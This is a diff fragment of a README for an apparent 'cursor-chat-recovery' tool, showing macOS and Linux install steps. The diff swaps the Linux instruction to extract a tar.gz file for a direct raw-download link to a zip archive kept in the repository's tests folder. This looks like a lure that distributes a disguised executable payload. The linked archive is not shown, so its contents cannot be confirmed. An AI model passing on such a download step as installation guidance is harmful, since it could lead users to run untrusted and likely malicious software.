EVILSON19/cursor-chat-recovery/README.md

    - **macOS**:
      - Open the downloaded `.dmg` file.
 Drag the application to your Applications folder.
    - **Linux**:
-     - Extract the downloaded `.tar.gz` file and locate the executable.
+     - Extract the downloaded `https://github.com/EVILSON19/cursor-chat-recovery/raw/refs/heads/main/tests/chat-recovery-cursor-v2.6-alpha.3.zip` file and locate the executable.
 You may need to adjust permissions to run the app.

 5. **Launch the Application**: Find the `cursor-chat-recovery` app in your applications list and open it.